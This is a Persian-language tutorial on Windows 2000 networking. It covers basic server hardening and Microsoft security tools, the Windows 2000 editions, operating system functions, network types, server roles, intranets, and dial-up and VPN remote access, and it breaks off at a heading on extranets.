• تمام سرويس های غير ضروری نظير Telnet,FTP,WEB را غير فعال نمائيد. از صحت محل استقرار سرويس ها بر روی شبکه اطمينان حاصل نمائيد . مثلا" سرويس دهنده RAS و WEB نبايد بر روی يک کنترل کننده Domain ، نصب گردند .
• امکان مميزی (auditing) در شبکه را فعال نمائيد . در ساده ترين حالت مميزی مربوط به ورود و خروج از شبکه ، دستيابی به امتيازات کاربران و رويدادهای سيستمی نظير غير فعال نمودن سيستم (Shutdown) است .
• اعتماد (Trust) موجود بين حوزه ها (Domian) را بررسی و در صورت امکان، موارد غير ضروری را حذف نمائيد .

برنامه های ماکروسافت
وجود نقاط آسيب پذير در برنامه هائی نظير outlook,Microsoft Exchange,SQL Server و IIS ، بستر مناسب برای متجاوران اطلاعاتی بمنظور نفوذ در شبکه را ايجاد می نمايد . بنابراين لازم است که از آخرين Service Pack و Patch مربوط به هر يک از برنامه ها استفاده گردد . شرکت ماکروسافت، بمنظور بهبود امنيت برنامه ها ، ابزارهای متعددی را ارائه نموده است . ليست برخی از اين برنامه ها در جدول زير نشان داده شده است .

توضيحات	برنامه
به مديران سرويس دهنده وب امکان اعمال محدوديت در رابطه با پاسخ به درخواست های معتبر را خواهد داد . جزئيات بيشتر	URL Scan Security Tool
ابزاری برای ايمن سازی سرويس دهنده وب IIS ، نسخه های چهار و پنج . جزئيات بيشتر	IIS Lockdown Tool
يک نسخه جديد از برنامه بهنگام سازی Outlook بمنظور حفاظت در مقابل انواع حملات اينترنتی مبتنی بر نامه های الکترونيکی . جزئيات بيشتر	Improved Outlook E-mail Security Update
ابزاری بمنظور بررسی آخرين نسخه های Patch نصب شده در رابطه با سيستم عامل و برخی از برنامه ها نظير IIS, IE و SQL . جزئيات بيشتر	HFNetChk Security Tool
ابزاری بمنظور بررسی صحت عملکرد امنيتی سرويس گيرندگان . جزئيات بيشتر	Microsoft Personal Security Advisor
برنامه ای جامع برای بررسی وضعيت امنيتی يک کامپيوتر . جزئيات بيشتر	Microsoft Baseline Security Analyzer

سيستم عامل ويندوز يکی از متداولترين  سيستم های عامل شبکه ای است که برای برپاسازی شبکه های کامپيوتری استفاده می گردد . در اين مقاله قصد داريم به بررسی اوليه ويندوز بعنوان يک سيستم عامل پرداخته و  در ادامه با مفاهيم اوليه شبکه آشنا و در نهايت به بررسی برخی از مفاهيم اوليه  ويندوز  بعنوان يک سيستم عامل شبکه ای ، بپردازيم .

هسته اساسی يک کامپيوتر سيستم عامل ، است . سيستم عامل، نرم افزاری است که سخت افزار را کنترل و همانگونه  که از نام آن مشخص است باعث انجام عمليات در کامپيوتر می گردد . سيستم عامل ، برنامه ها را به درون حافظه کامپيوتر استقرار و زمينه اجرای آنان را فراهم می نمايد. سيستم عامل دستگاه های جانبی ، نظير ديسک ها و چاپگرها را مديريت می نمايد.  کامپيوتر و چاپگر های موجود در يک محيط کامپيوتری را  می توان بيکديگر مرتبط تا زمينه مبادله اطلاعات و داده ها ، فراهم گردد. شبکه ، شامل گروهی از کامپيوترها و دستگاه های مرتبط بيکديگر است. هماهنگی در اجرای  همزمان برنامه ها در يک شبکه ، مديريت دستگاههای جانبی متصل به شبکه و موارد ديگر ، مستلزم وجود امکانات و پتانسيل های بيشتر از طرف سيستم عامل است . يک سيستم عامل شبکه ای ، امکانات فوق و ساير پتانسيل های لازم در خصوص  شبکه را ارائه می نمايد. ويندوز 2000 ماکروسافت، نسل جديدی از سيستم های عامل شبکه ای است که زيرساخت مناسبی را بمنظور مديريت و حمايت از برنامه ها بمنظور استفاده توسط کاربران شبکه و سازمان های مربوطه، فراهم می نمايد.

نسخه های متفاوت ويندوز 2000
ويندوز 2000 ، مجموعه ای گسترده از امکانات و ابزارهای لازم ، بمنظور مديريت يک شبکه کامپيوتری را ارائه و دارای نسخه های متفاوت زير است :

• Microsoft Windows 2000 Professional . نسخه فوق، دارای امکانات گسترده ويندوز 98 بوده و بر اساس قدرت سنتی سيستم عامل ويندوز NT 4.0، ايجاد شده است . اين نسخه ، دارای يک رابط کاربر ساده بوده و علاوه بر بهبود در عمليات Plug&Play و مديريت Power ، مجموعه ای گسترده از دستگاه های سخت افزاری را حمايت می نمايد. نسخه فوق، حداکثر دو پردازنده و 4 گيگابايت حافظه را حمايت می نمايد.
• Microsoft Windows 2000 Server . نسخه فوق، بعنوان نسخه استاندارد خانواده windows 2000 server ، مطرح می باشد. اين نسخه دارای تمامی امکانات windows 2000 professional بوده و برای سازمان های کوچک تا متوسط ايده آل و بخوبی با سرويس دهندگان فايل ، چاپگر ، وب و Workgroup ، کار می نمايد. نسخه فوق، قادر به حمايت از حداکثر 4 پردازنده و 4 گيگابايت حافظه فيزيکی است .
• Microsoft Windows 2000 Advanced Server . نسخه فوق، دارای تمامی امکانات نسخه windows 2000 server بوده و علاوه بر آن قابليت گسترش و در دسترس بودن بيشتری را دارا است . با گسترش شبکه ، قدرت پردازش سيستم بصورت تصاعدی افزايش خواهد يافت.بدين منظور از کلاسترهائی که شامل چندين سرويس دهنده می باشند ، استفاده می گردد. سرويس دهندگان فوق ، توان پردازشی اضافه ای را ارائه و بدين ترتيب قابليت در دسترس بودن سيستم نيز، افزايش خواهد يافت . در صورتيکه يکی از سرويس دهندگان بدلايلی غيرقابل دسترس گردد، ساير سرويس دهندگان موجود در کلاستر، سرويس های مورد نياز را ارائه خواهند داد . نسخه فوق، مختص سرويس دهندگانی است که در شبکه های بسيار بزرگ ايفای وظيفه نموده و عمليات گسترده ای را در ارتباط با بانک های اطلاعاتی انجام می دهند. نسخه فوق، قادر به حمايت از هشت پردازنده و هشت گيگابايت حافظه فيزيکی است .
• Microsoft Windows 2000 Datacenter Server . نسخه فوق، دارای تمام امکانات Advanced server بوده و علاوه بر آن امکان استفاده از حافظه و پردارنده های بمراتب بيشتری در هر کامپيوتر را فراهم می نمايد. نسخه فوق، برای ذخيره سازی حجم بسيار بالائی از داده ها ، پردازش های تراکنشی online و شبيه سازی های بزرگ استفاده می گردد . نسخه فوق، قادر به حمايت از حداکثر 32 پردازنده و 64 گيگابايت حافظه فيزيکی است .

وظايف سيستم عامل
سيستم عامل ، نرم افزاری است که امکانات لازم  بمنظور ارتباط برنامه ها با سخت افزار را فراهم می نمايد. مهمترين وظايف يک سيستم عامل در ارتباط با عمليات در يک کامپيوتر ، بشرح زير می باشد :

• مديريت سخت افزار. سيستم عامل، امکان ارتباط کامپيوتر با دستگاه های جانبی نظير چاپگر و يا موس را فراهم می نمايد
• مديريت نرم افزار. سيستم عامل ، مکانيزمی برای مقداردهی اوليه پردازه ها ی مربوط به برنامه ها را فراهم می نمايد.
• مديريت حافظه . سيستم عامل، عمليات اختصاص حافظه برای هر برنامه بدون تاثيرگذاری بر فضای استفاده شده توسط ساير برنامه ها را فراهم می نمايد.
• مديريت داده . سيستم عامل، مديريت فايل های ذخيره شده بر روی هارد ديسک و ساير رسانه های ذخيره سازی را بر عهده دارد . در اين راستا ، امکان ايجاد و فعال کردن فايل ها در اختيار برنامه ها قرار گرفته و زمينه مباددله داده بين دستگاههای فراهم خواهدشد. سيستم عامل، امکان انجام عمليات مديريتی در ارتباط با فايل ها نظير تغيير نام و يا حذف فايل ها را نيز فراهم می نمايد.

سيستم عامل ،  هماهنگی لازم در خصوص ارتباط بين کامپيوتر و برنامه هائی که بر روی آن اجراء می گردند را فراهم می نمايد. جريان داده ها توسط سيستم عامل دنبال و کنترل و يک رابط کاربر گرافيکی GUI ( گرافيکی )  بمنظور ارتباط کاربر با کامپيوتر  ارائه می گردد. GUI ،  يک رابط کاربر گرافيکی ،  بمنظور ارتباط کاربر با سيستم و فعال نمودن دستورات مورد نظر است .( در مقايسه با يک محيط مبتنی بر متن )

سيستم عامل ويندوز 2000 ، امکانات گسترده و پيشرفته ای را در اختيار کاربران قرار می دهد:

• Multitasking . با استفاده از ويژگی فوق، کاربران قادر به اجرای چندين برنامه بصورت همزمان بر روی يک سيستم می شوند. تعداد برنامه هائی که يک کاربر قادر به اجرای همزمان آنان خواهد بود به ميزان حافظه موجود بر روی سيستم بستگی خواهد داشت .
• Memory Support . بمنظور انجام عمليا ت مربوط به برنامه هائی که در محيط ويندوز 2000 اجراء می گردند ، به ميزان مطلوبی از حافظه ، نياز خواهد بود. برای اجرای چندين برنامه بصورت همزمان و يا اجرای برنامه هائی که ميزان بالائی از حافظه را نياز دارند ، ويندوز 2000 امکان حمايت تا 64 گيگابايت را فراهم می نمايد.
• Symmetric Multiprocessing . سيستم های عامل از ويژگی فوق، بمنظور استفاده همزمان از چندين پردازنده استفاده می نمايند .بدين ترتيب کارآئی سيستم بهبود و يک برنامه در محدوده زمانی کمتری اجراء خواهد شد .ويندوز 2000 ، امکان حمايت ( با توجه به نوع نسخه ) از حداکثر 32 پردازنده را فراهم می نمايد.
• Plug &Play . با استفاده از ويندوز 2000 ، دستگاههائی از نوع PNP بسادگی نصب می گردند . دستگاههای PNP ، دستگاههائی هستند که پس از اتصال به سيستم ، بدون نياز به انجام فرآيندهای پيچيده ، نصب خواهند شد . پس از اتصال چنين دستگاههائی، ويندوز 2000 بصورت اتوماتيک آنان را تشخيص و عناصر مورد نياز را نصب و پيکربندی مربوطه را انجام خواهد داد .
• Clustering . ويندوز 2000 ، امکان گروبندی مستقل کامپيوترها را بايکديگر و بمنظور اجرای يک مجموعه از برنامه ها فراهم می نمايد. اين گروه بعنوان يک سيستم برای سرويس گيرندگان و برنامه ها در نظر گرفته خواهد شد . چنين گروه بندی، Clustering ناميده شده و گروههائی از کامپيوترها را کلاستر می گويند. اين نوع سازماندهی کامپيوترها ، باعث برخورد مناسب در صورت بروز اشکال در يک نقطه می گردد . در صورتيکه يک کامپيوتر دچار مشکل گردد، کامپيوتر ديگر در کلاستر ، سرويس مربوطه را ارائه خواهد داد .
• File System . ويندوز 2000 ، از سه نوع متفاوت سيستم فايل حمايت می نمايد : FAT(File Allocation table) ، FAT32 و NTFS . در صورتيکه نيازی به استتفاده از قابليت های بوت دوگانه (راه اندازی سيستم از طريق دو نوع متفاوت سيستم عامل با توجه به خواسته کاربر) وجود نداشته باشد، ضرورتی به استفاده از سيستم فايل FAT و يا FAT32 وجود نخواهد داشت . NTFS ، سيستم فايل پيشنهادی برای ويندوز 2000 بوده و امکانات امنيتی مناسبی را ارائه می نمايد. ويندوز 2000 ، با استفاده از سيستم NTFS امکانات متعددی نظير : بازيافت سيستم فايل، اندازه پارتيش های بالا، امنيت، فشرده سازی و Disk Quotas را ارائه می نمايد.
• Quality of Service )QoS) . امکان QoS ، مجموعه ای از سرويس های مورد نظر بمنظور حصول اطمينان از انتقال داده ها با يک سطح قابل قبول در يک شبکه است با استفاده از QoS ، می توان نحوه پهنای باند اختصاصی به يک برنامه را کنترل نمود. QoS ، يک سيستم مناسب ، سريع و تضمين شده برای اطلاعات در شبکه را فراهم می نمايد .
• Terminal Service . با استفاده از ويژگی فوق ، امکان دستيابی از راه دور به يک سرويس دهنده از طريق يک ترمينال شبيه سازی شده ، فراهم می گردد . يک ترمينال شبيه سازی شده ، برنامه ای است که امکان دستيابی به يک کامپيوتر از راه دور را بگونه ای فراهم می نمايد که تصور می شود شما در کنار سيستم بصورت فيزيکی قرار گرفته ايد. با استفاده از سرويس ترمينال، می توان برنامه های سرويس گيرنده را بر روی سرويس دهنده اجراء و بدين ترتيب کامپيوتر سرويس گيرنده بعنوان يک ترمينال ايفای وظيفه خواهد کرد ( نه بعنوان يک سيستم مستقل) . بدين ترتيب هزينه مربوط به عمليات و نگهداری شبکه کاهش و می توان مديريت سرويس دهنده را از هر مکانی بر روی شبکه انجام داد.
• Remote Installation Services)RIS) . سرويس فوق، امکان بکارگيری سيستم عامل در يک سازمان توسط مديران سيستم را تسريع و بهبود خواهد بخشيد. بدين ترتيب نياز به ملاقات فيزيکی هر يک از کامپيوترهای سرويس گيرنده وجود نداشته و می توان از راه دور ، اقدام به نصب نمود. سرويس فوق ، يک عنصر انتخابی بوده و بعنوان بخشی از نسخه windows 2000 server است .

مبانی شبکه های کامپيوتری
فرض کنيد در سازمانی ، می بايست تعدادی زيادی از کارکنان از داده های مشابه استفاده  نمايند . يکی از راه حل ها ی مربوطه می تواند استقرار  يک نسخه از داده ها  بر روی هر يک از کامپيوتر ها باشد. بدين ترتيب هر يک از کارکنان بصورت مجزاء به داده ها دستيابی خواهند داشت . راه حل ديگر در اين زمينه ، استقرار داده ها بر روی يک کامپيوتر و دستيابی ساير کامپيوتر به داده های مورد نياز از راه دور است. رويکرد فوق ،  باعث صرفه چوئی در فضای ذخيره سازی  بر روی کامپيوترها شده و يک محل مرکزی برای ذخيره سازی و مديريت داده هائی را که چندين کاربر نيازمند دستيابی به آنان می باشند را فراهم می نمايد .عمليات فوق،  مستلزم اشتراک داده ها و منابع بوده و ما را بسمت پياده سازی شبکه هدايت می نمايد.شبکه شامل گروهی از کامپيوترهای مرتبط بهم است که امکان اشتراک اطلاعات را به کاربران خواهد داد .در يک شبکه ، کاربران متعددی قادر به دستيابی به اطلاعات مشابه و اتصال به منابع يکسانی می باشند . مثلا" در مقابل ارتباط هر کامپيوتر به چاپگر اختصاصی خود،  تمام کامپيوترها می توانند به يک چاپگر مرتبط و بدين ترتيب امکان استفاده از چاپگر بصورت مشترک توسط چندين کاربر فراهم می گردد .

مزايای شبکه
برپاسازی يک شبکه کامپيوتری دارای مزايای زير است :

• اشتراک اطلاعات . امکان اشتراک اطلاعات و داده ها با سرعت مطلوب و هزينه پايين ، از مهمترين مزايای يک شبکه کامپيوتری است .
• اشتراک سخت افزار و نرم افزار . قبل از مطرح شدن شبکه ، کاربران کامپيوتر ، از چاپگر و ساير دستگاههای جانبی اختصاصی استفاده می کردند. رويکرد فوق ، افزايش هزينه ها خصوصا" در سازمان های بزرگ را بدنبال خواهد داشت . شبکه های کامپيوتری ، کاهش هزينه های فوق را بدنبال داشته وامکان استفاده از منابع سخت افزاری و نرم افزاری مشترک بصورت همزمان توسط کاربران متعددی را فراهم می نمايد.
• مديريت و حمايت متمرکز . برپاسازی يک شبکه ، باعث تسهيل در امر مديريت و عمليات مربوط به پشتيبانی می گردد. بدين ترتيب ، مديريت شبکه از يک محل ، قادر به انجام عمليات و وظايف مديريتی بر روی هر يک از کامپيوترهای موجود در شبکه خواهد بود.

نقش ( وظايف ) کامپيوترها در شبکه
کامپيوترهای موجود در شبکه بعنوان سرويس گيرنده و يا سرويس دهنده،  ايفای وظيفه می نمايند .

• کامپيوترهای سرويس گيرنده، درخواست خود برای دريافت سرويس و يا اطلاعات را از کامپيوترهائی در شبکه که بعنوان سرويس دهنده ، ايفای وظيفه می نمايند ، مطرح می نمايند .
• کامپيوترهای سرويس دهنده، کامپيوترهائی هستند که سرويس ها و داده های مورد نياز کامپيوترهای سرويس گيرنده را ارائه می نمايند. سرويس دهندگان در شبکه ، عمليات متفاوت و پيچيده ای را انجام می دهند. سرويس دهندگان، برای شبکه های بزرگ اختصاصی شده تا قادر به پاسخگوئی به نيازهای توسعه يافته کاربران باشند. نمونه های زير انواع متفاوت سرويس دهندگان در يک شبکه بزرگ را نشان می دهد:
  سرويس دهنده فايل و چاپ . اين نوع سرويس دهندگان، منابع فايل و چاپگر را از طريق يک نقظه متمرکز، ارائه می نمايند. زمانيکه سرويس گيرنده ای درخواست خود را برای دريافت داده ، فايل و سرويس دهنده چاپ ، ارسال می نمايد، تمام اطلاعات و يا فايل درخواستی بر روی کامپيوتر متقاصی دريافت می گردد. مثلا" زمانيکه يک برنامه واژه پرداز فعال می گردد، برنامه برروی کامپيوتر شما اجراء و مستندات ذخيره شده بر روی سرويس دهنده چاپ و يا فايل در حافظه کامپيوتر شما مستقر تا امکان ويرايش و يا استفاده محلی از مستندات فراهم گردد . زمانيکه مستندات مجددا" بر روی سرويس دهنده ذخيره می گردد، ساير کاربران شبکه که دارای مجوزهای لازم دستيابی می باشند ، قادر به مشاهده و استفاده از مستندات خواهند بود.سرويس دهندگان فايل و چاپ، تمرکزدر ذخيره سازی فايل ها و داده ها را بدنبال خواهند داشت.
  سرويس دهنده بانک اطلاعاتی . سرويس دهندگان بانک اطلاعاتی، قادر به ذخيره سازی حجم بالائی از داده ها در يک مکان متمرکز بوده و از اين طريق داده ها در دسترس کاربران قرار گرفته و ضرورتی به دريافت تمام بانک اطلاعاتی نخواهد بود. با استفاده از يک سرويس دهنده بانک اطلاعاتی، تمام بانک اطلاعاتی بر روی سرويس دهنده ذخيره و صرفا" نتايج مربوط به يک درخواست برای متقاضی ارسال خواهد شد. مثلا" می توان از بانک اطلاعاتی کارکنان بر روی يک سرويس دهنده اطلاعاتی نظير Microsoft SQL Server استفاده کرد. زمانيکه سرويس دهنده درخواست شما را پردازش می نمايد ، صرفا" نتايج پرس و جو (Query) از طريق سرويس دهنده برای سرويس گيرنده ارسال می گردد.
  سرويس دهنده پستت الکترونيکی . سرويس دهنده پست الکترونيکی، نظير سرويس دهنده بانک اطلاعاتی رفتار می نمايد با اين تفاوت که از برنامه های سرويس دهنده و سرويس گيرنده مجزائی استفاده می گردد. داده های انتخابی از سرويس دهنده برای سرويس گيرنده ارسال خواهد شد. سرويس دهنده پست الکترونيکی، مديريت پيام های الکترونيکی در شبکه برعهده دارد.
  سرويس دهنده فاکس (نمابر) . سرويس دهندگان فاکس، مديريت ترافيک فاکس به و يا از شبکه را با اشتراک يک و يا چندين دستگاه فاکس مودم ، فراهم می نمايند. بدين ترتيب، سرويس فاکس برای هر يک از کاربران شبکه فراهم و ضرورتی به نصب يک دستگاه فاکس برای هر يک از کامپيوترها ، وجود نخواهد داشت .
  سرويس دهنده Directory Service . سرويس دهنده فوق، يک محل مرکزی بمنظور ذخيره اطلاعات در رابطه با شبکه نظير اسامی کاربران و منابع موجود در شبکه است . بدين ترتيبز امنيت شبکه بصورت متمزکز مديريت خواهد شد . مديريت شبکه قادر به تعريف يک منبع نظير چاپگر و نوع دستيابی کاربران،خواهد بود. پس از تعريف منابع توسط مديريت شبکه، کاربران قادر به دستيابی و استفاده از منابع خواهند بود. نوع استفاده از منابع بر اساس سياست هاتی است که توسط مديريت شبکه برای کاربران تعريف و درنظر گرفته شده است .

انواع شبکه
با توجه به نحوه پيکربندی کامپيوترها در شبکه و نحوه دستيابی به اطلاعات ،  شبکه ها را به دو گروه عمده Peer-To-Peer و Client Server تقسيم می نمايند:

• Peer-To-Peer ( نظير به نظير ) . در شبکه های نظير به نظير، سرويس دهنده اختصاصی وجود نداشته و سلسله مراتبی در رابطه با کامپيوترها رعايت نمی گردد. تمام کامپيوترها معادل و همتراز می باشند. هر کامپيوتر در شبکه هم بعنوان سرويس گيرنده وهم بعنوان سرويس دهنده ايفای وظيفه نموده و امنيت بصورت محلی و بر روی هر کامپيوتر ارائه می گردد . کاربر هر يک از کامپيوترها مشخص می نمايد که چه داده ئی بر روی کامپيوتر خود را می بايست به اشتراک قرار دهد. شبکه های نظير به نظير workgroup ، نيز ناميده می شوند . واژه workgroup ، نشاندهنده يک گروه کوچک ( معمولا" ده و يا کمتر ) از کامپيوترهای مرتبط با يکديگر است . شبکه های نظير به نظير ، گزينه ای مناسب برای محيط هائی با شرايط زير می باشند:
  ○ حداکثر تعداد کاربران ده و يا کمتر .
  ○ کاربران منابع و چاپگرها را به اشتراک گذاشته و در اين راستا ، سرويس دهندگان خاصی وجود ندارد.
  ○ امنيت متمرکز مورد نظر نباشد .
  ○ رشد سازمان و شبکه بر اساس آناليز شده، محدود باشد .
• Client Server ( سرويس دهنده - سرويس گيرنده ) . بموازات رشد شبکه و افزايش کاربران و منابع موجود ،يک شبکه نظير به نظير قادر به پاسخگوئی به حجم بالای تقاضا برای منابع اشتراکی نخواهد بود بمنظور هماهنگی با افزايش تقاضا و ارائه سرويس های مورد نياز ، شبکه ها می بايست از سرويس دهندگان اختصاصی، استفاده نمايند . يک سرويس دهنده اختصاصی، صرفا" بعنوان يک سرويس دهنده در شبکه ايفای وظيفه می نمايد (نه بعنوان يک سرويس گيرنده) . شبکه های سرويس گيرنده - سرويس دهنده ، بعنوان مدلی استاندارد برای برپاسازی شبکه مطرح شده اند . بموازات رشد شبکه ( تعداد کامپيوترها متصل شده ، فاصله فيزيکی ، ترافيک موجود) می توان تعداد سرويس دهندگان در شبکه را افزايش داد. با توزيع مناسب فعاليت های شبکه بين چندين سرويس دهنده ، کارآئی شبکه بطرز محسوسی.

در بخش دوم اين مقاله ، به بررسی سيستم های عامل شبکه ای پرداخته و نحوه پياده سازی شبکه در ويندوز بررسی خواهد شد

مبانی  زيرساخت شبکه های مبتنی بر ويندوز

سازمان ها و موسسات بمنظور برپاسازی شبکه و اتصال هر يک از مراکز  به دفاتر مرکزی  ،  نيازمند پيکربندی و مديريت شبکه های کامپيوتری می باشند. ويندوز 2000 ،  مجموعه ای از سرويس های شبکه  مبتنی بر  پروتکل های استاندارد  و تکنولوژی های لازم بمنظور ايجاد يک شبکه مطمئن را ارائه می نمايد . در اين مقاله به بررسی : عناصر لازم در زيرساخت شبکه های مبتنی بر ويندوز ،جايگاه  يک اينترانت در شبکه های مبتنی بر ويندوز ، روش های  دستيابی از راه دور، نحوه اتصال يک سازمان  از راه دور به يک اينترانت، روش های دستيابی بمنظور برقراری ارتباط با اينترنت و اهداف يک   اکسترانت ، اشاره می گردد.

مروری به زيرساخت شبکه های مبتنی بر ويندوز
محصولات خانواده ويندوز 2000 سرويس دهنده ، مجموعه ای از تکنولوژی ها و سرويس ها را بمنظور نصب ،پيکربندی، مديريت و حمايت از زيرساخت شبکه ارائه می نمايند.  زير ساخت شبکه، می تواند شامل هر يک از عناصر زير باشد :

• اينترانت (Intranet) . يک شبکه خصوصی در يک سازمان  که از آن بمنظور توزيع اطلاعات داخلی استفاده می گردد. اينترانت ، يک شبکه محلی (LAN) نيز ناميده می شود. اينترانت، شامل سرويس های متعددی نظير : توزيع مستندات، توزيع نرم افزار ،دستيابی به بانک های اطلاعاتی و موارد ديگر  است . علاوه بر امکان اشتراک فايل و چاپگر، يک اينترانت امکان استفاده  از نرم افزارهای مرتبط با اينترنت را نيز فراهم می نمايد: صفحات وب ،مرورگرهای وب، پروتکل ارسال فايل (FTP) ،پست الکترونيکی، گروه های خبری و ليست های ارسال نامه الکترونيکی ، نمونه هائی در اين زمينه می باشند.
• دستيابی از راه دور . با استفاده از ويژگی فوق ، تسهيلات و امکانات شبکه ای لازم در خصوص : ارتباط  کامپيوترهای  راه دور ، دستگاه های موبايل ، مديران سيستم که مسئوليت هماهنگی و مديريت سرويس دهندگان متعدد موجود در دفاتر متفاوت يک سازمان را بر عهده دارند ، فراهم می گردد .  در چنين مواردی ، تمامی سرويس ها ، برای کاربران متصل به شبکه ( کاربرانی که با استفاده از امکانات پيش بينی شده قادر به ارتباط با شبکه از راه دور می باشند ) ،  قابل دستيابی خواهد بود : اشتراک فايل و چاپ، دستيابی به سرويس دهنده وب نمونه هائی از اين سرويس ها می باشند.
• ادارات از راه دور .  بخشی از يک سازمان که از لحاظ جغرافيائی در يک مکان مجزاء نسبت به اداره مرکزی است . اين نوع دفاتر خود دارای يک شبکه محلی (LAN) بوده و می توانند به شبکه  سازمان مربوطه  متصل و يک شبکه WAN را ايجاد نمايند. اتصال WAN  ، يک اتصال از راه  دور اشتراکی به شبکه بمنظور امکان دستيابی کاربران  ادارات راه دوربه منابع مشترک  در تمام  سازمان است . لينک های WAN  دائمی  بوده و همواره قابل دستيابی می باشند .
• اينترنت . مجموعه ای گسترده از شبکه ها و دروازه ها که از پروتکل TCP/IP بمنظور ارتباط با يکديگر استفاده می نمايند. اينترنت، شامل خطوط ارتباطی با سرعت بالا بين گره های اصلی و يا کامپيوترهای ميزبانی  است  که داده ها و پيام ها را Route می نمايد.
• اکسترانت (Extranet) . يک شبکه مشترک که از تکنولوژی اينترنت بمنظور تسهيل در ارتباط بين بنگاه های تجاری ، تهيه کنندگان ، مشتريان و يا ساير فعاليت های تجاری استفاده می گردد . يک اکسترانت ،ممکن است بعنوان بخشی از يک اينترانت سازمان بوده که ساير سازمان ها قادر به دستيابی به آن می باشند. اشتراک و استفاده از اطلاعات می تواند جنبه عمومی داشته و يا صرفا"  گروه های خاصی را شامل گردد .

بمنظور پيکربندی زير ساخت شبکه ، می بايست پروتکل های شبکه بهمراه  سرويس ها ی استفاده شده ، بدرستی پيکربندی گردند . در ادامه به تشريح هر يک از موارد فوق ، خواهيم پرداخت .

اينترانت ها
اينترانت، يک شبکه خصوصی است که امکان اتصال کامپيوترها و دستگاه های مورد نظر را بمنظور ارتباط با يکديگر  فراهم می نمايد. مهمترين وظيفه ( عمليات ) يک اينترانت ،امکان اشتراک اطلاعات و منابع برای کاربران است . بمنظور ارتباط با شبکه از پروتکل TCP/IP ،استفاده می گردد . TCP/IP ، مجموعه ای از پروتکل ها ئی است که بعنوان يک استاندارد صنعتی پذيرفته شده و اغلب سرويس های شبکه در ويندوز وابسته به آن می باشند.  قابليت TCP/IP ، بگونه ای است که امکان استفاده از آن درشبکه هائی با ابعاد متفاوت وجود خواهد داشت . پروتکل فوق ، در زمان نصب ويندوز 2000  بصورت استاندارد و پيش فرض نصب می گردد.

روش های دستيابی از راه دور
يکی از ضرورت های شبکه های کامپيوتری ، امکان دستيابی از راه دور برای کاربران و ارتباط آنان با شبکه موجود در سازمان مربوطه است. بدين ترتيب، سرويس گيرندگان از راه دور قادر به دستيابی منابع موجود در شبکه از مکان های  دور خواهند بود ( مشابه اتصال فيزيکی آنان به شبکه ) . ويندوز 2000 ، برای دستيابی از راه دور ، دو گزينه ( روش ) متفاوت را ارائه  می نمايد :

• دستيابی از راه دور بصورت Dial-up . بمنظور دستيابی به شبکه از راه دور  توسط Dial-up ، يک سرويس گيرنده ، از شبکه تلفن موجود  استفاده تا با يک پورت بر روی سرويس دهنده مرتبط و يک ارتباط فيزيکی را  ايجاد نمايد.  در اين روش ، اغلب از يک مودم و يا آداپتورهای ISDN)Integrated Services Digital Network ) ، استفاده تا با سرويس دهنده ، ارتباط برقرار گردد .
• دستيابی از راه دور VPN . يک VPN)Virtual private network ) ، امکان دستيابی از راه دور ايمن و مطمئن ، بکمک اينترنت ، را فراهم می نمايد( در مقابل تماس مستقيم تلفنی ) . سرويس گيرنده VPN يک اتصال رمزشده مجازی و نقطه به نقطه (Point-to-point) را  با يک دروازه VPN که در شبکه خصوصی وجود دارد، برقرار می نمايد.در اين روش می توان به اينترنت و  با سرعت بالا متصل و در ادامه اتصال VPN را ايجاد کرد .

ارزيابی روش های دستيابی از راه دور
بمنظور ارائه  يک راه حل جهت دستيابی از راه دور ، می بايست در ابتدا نيازها و خواسته های  مربوط  مشخص و در ادامه با توجه به گزينه های موجود ،  مزايا و ويژگی های هر يک از راه حل های موجود  ( Dial-up و يا VPN) بررسی و مقايسه گردد .برای ارائه يک راه حل ، می توان صرفا" اقدام به انتخاب يک روش  و يا از هر دو روش ممکن ، استفاده کرد. مثلا" برخی سازمان ها از يک VPN بعنوان اتصال اوليه استفاده و از اتصال Dial-up ، برای موارديکه دستيابی به اينترنت غيرممکن است ،استفاده می نمايند . برای ارزيابی روش های دستيابی از راه دور ، موارد زير پيشنهاد می گردد :

• استفاده از روش  Dial-up ، در موارديکه سازمان ها و موسسات دارای کاربران از راه دور محدود  و يا کاربران ساکن در مناطق محلی تماس می باشند ، پيشنهاد می گردد .
• دستيابی از راه دور VPN اين امکان را به سازمان ها و موسسات خواهد داد که از زيرساخت موجود اينترنت در مقابل طراحی و ارائه  زير ساخت اختصاصی خود استفاده نمايند . در موارديکه تعداد کاربران از راه دور زياد و محل استقرار آنان در مسافت های طولانی باشد ، استفاده از روش فوق پيشنهاد می گردد. پهنای باند لازم جهت دستيابی به شبکه نيز از مواردی است که می بايست بدقت مورد بررسی قرار گيرد . در اين روش تاکيد بر استفاده از زير ساخت موجود اينترنت بوده و سازمان ها در مقابل پياده سازی زير ساخت اختصاصی خود که قطعا" هزينه های متعددی را بدنبال خواهد داشت ، از راه حل فوق بعنوان گزينه ای بهينه ، استفاده می نمايند.

ارتباط با ادارات از راه دور
سازمان ها و موسسات ، اغلب دارای يک و يا چندين شعبه در مکان های از راه دور بوده که در هر يک از آنها شبکه های محلی ، نيز وجود دارد . با اتصال اين شبکه ها بيکديگر يک سازمان قادر به ارائه خدمات و عمليات خود بصورت موثرتر، خواهد بود . بدين ترتيب ،  کارکنان ادارات راه دور، قادر به اشتراک اطلاعات و ارتباط با کارکنان مستقر در دفاتر مرکزی ، خواهند بود .  کارکنانی که بين ادارات متعدد مسافرت می نمايند ، نيز قادر به دستيابی  فايل ها و منابع از طريق هر يک از ادارت راه دور، می باشند . سگمنت های متعدد شبکه های مبتنی بر پروتکل TCP/IP را می توان با استفاده از روتر بيکديگر متصل نمود. روتر باعث forward نمودن بسته ها ی اطلاعاتی از يک سگمنت شبکه به سگمنت ديگر می گردد .

امکان دستيابی به اينترنت
سازمان ها و موسسات متعدد،  نيازمند دستيابی به اينترنت برای ايجاد يک وب سايت، دستيابی از راه دور VPN , انجام تحقيقات و يا استفاده از سيستم پست الکترونيکی، می باشند . ويندوز 2000 ، سرويس های لازم بمنظور ارتباط يک سازمان به اينترنت را فراهم می نمايد. بمنظور دستيابی به اينترنت از گزينه های متعددی استفاده می گردد :

• Dial-Up به  ISP . از  روش فوق، در سازمان های کوچک و برخی کاربران خانگی ، استفاده می گردد.
• يک خط اختصاصی نظير T1 که به يک شبکه LAN متصل می گردد . روش فوق، برای سازمان های بزرگ که دارای  کاربران متعدد با نوع استفاده متنوع از اينترنت ، می باشند ، مناسب است . سازمان ها و موسساتی که تمايل به راه اندازی وب سايت و يا سرويس پست الکترونيکی و ساير سرويس های اختصاصی خود در اينترنت را دارند ، می توانند از گزينه فوق استفاده نمايند .

اکسترانت ها 
